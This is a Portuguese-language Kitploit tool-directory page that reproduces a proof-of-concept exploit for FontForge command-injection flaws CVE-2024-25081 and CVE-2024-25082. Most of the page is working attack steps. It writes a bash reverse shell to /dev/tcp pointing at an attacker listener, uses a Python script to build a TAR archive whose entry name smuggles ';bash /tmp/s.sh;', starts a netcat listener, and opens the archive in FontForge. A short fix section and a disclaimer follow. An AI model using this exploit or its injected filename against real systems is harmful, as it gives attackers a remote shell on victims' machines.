Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-25082_CVE-2024-25081 — Vulnerabilidade de Injeção de Comandos em Nome de Arquivo Criado com Splinefont do FontForge | Kitploit
Ferramentas/GitHubGitHub/alielkhatteb/cve-2024-25082_cve-2024-25081
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoComando e ControleAprendizado e Educação
GitHubalielkhatteb/cve-2024-25082_cve-2024-25081

CVE-2024-25082_CVE-2024-25081

Vulnerabilidade de Injeção de Comandos em Nome de Arquivo Criado com Splinefont do FontForge

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
11há 5 mesesAinda não revisado
Compartilhar

⚠️ RCE no FontForge — CVE-2024-25081 & CVE-2024-25082 - PoC

📖 Visão Geral

Exploit de prova de conceito para duas vulnerabilidades de injeção de comandos no FontForge ≤ 20230101 (componente Splinefont).

CVEVetorGatilho
CVE-2024-25081Nome de arquivo maliciosoAbertura direta de arquivo
CVE-2024-25082Nome de arquivo de archive maliciosoExtração de TAR/ZIP/GZ/BZ2

Este PoC tem como alvo a CVE-2024-25082 — a extração automática de arquivos do FontForge passa nomes de arquivo para um shell sem sanitização, permitindo que um payload delimitado por ponto e vírgula incorporado em um nome de entrada TAR execute comandos arbitrários.


Como Funciona

O FontForge suporta a abertura de arquivos de fonte diretamente de arquivos compactados. Ao extrair um archive TAR, o componente Splinefont constrói um comando shell usando o nome do arquivo da entrada do archive. Como o nome do arquivo não é sanitizado, um ponto e vírgula (;) no nome da entrada sai do comando esperado e injeta instruções arbitrárias no shell.

Nome de entrada TAR malicioso:

root@kitploit:~
exploit.ttf;bash /tmp/s.sh;

Quando o FontForge processa este archive, o shell interpreta isto como:

root@kitploit:~
<extract command> exploit.ttf ; bash /tmp/s.sh ; 

Ambiente

  • Software vulnerável: FontForge ≤ 20230101
  • Plataforma: Linux
  • Listener do atacante: 192.168.1.20:4444 (ajuste conforme necessário)

📋 Pré-requisitos

  • Python 3 (apenas biblioteca padrão, módulo tarfile)
  • netcat na máquina do atacante
  • FontForge ≤ 20230101 na máquina alvo

🛠️ Prova de Conceito

1. Inicie um listener netcat na sua máquina atacante

root@kitploit:~
nc -lvnp 4444

2. Gere o archive TAR malicioso

root@kitploit:~
# Write the reverse shell payload
echo 'bash -i >& /dev/tcp/192.168.1.20/4444 0>&1' > /tmp/s.sh
chmod +x /tmp/s.sh

# Build the malicious archive
python3 << 'EOF'
import tarfile, io

malicious_name = "exploit.ttf;bash /tmp/s.sh;"
tar = tarfile.open("exploit.tar", "w")
info = tarfile.TarInfo(name=malicious_name)
info.size = 4
tar.addfile(info, io.BytesIO(b"AAAA"))
tar.close()
print("done")
EOF

3. Abra o archive no FontForge na máquina alvo

root@kitploit:~
fontforge exploit.tar

Um reverse shell irá conectar de volta ao seu listener.


🔒 Correção

Corrigido no FontForge pós-20230101 via PR #5367. Atualize para a versão mais recente.

  • Debian/Ubuntu: sudo apt upgrade fontforge
  • Compilação manual: baixe a versão mais recente de fontforge/fontforge

🔍 Referência

  • NVD — CVE-2024-25081
  • NVD — CVE-2024-25082
  • FontForge fix PR #5367

⚖️ Aviso de Isenção e Termos

Este código de Prova de Conceito (PoC) é fornecido apenas para fins educacionais e de teste de penetração autorizado.

  • Nenhuma permissão é concedida para modificar, redistribuir ou usar este código para quaisquer outros fins.
  • O uso ou modificação não autorizada pode ser ilegal e antiético.
  • Os autores não assumem nenhuma responsabilidade por qualquer uso indevido ou danos.
Baixar ferramenta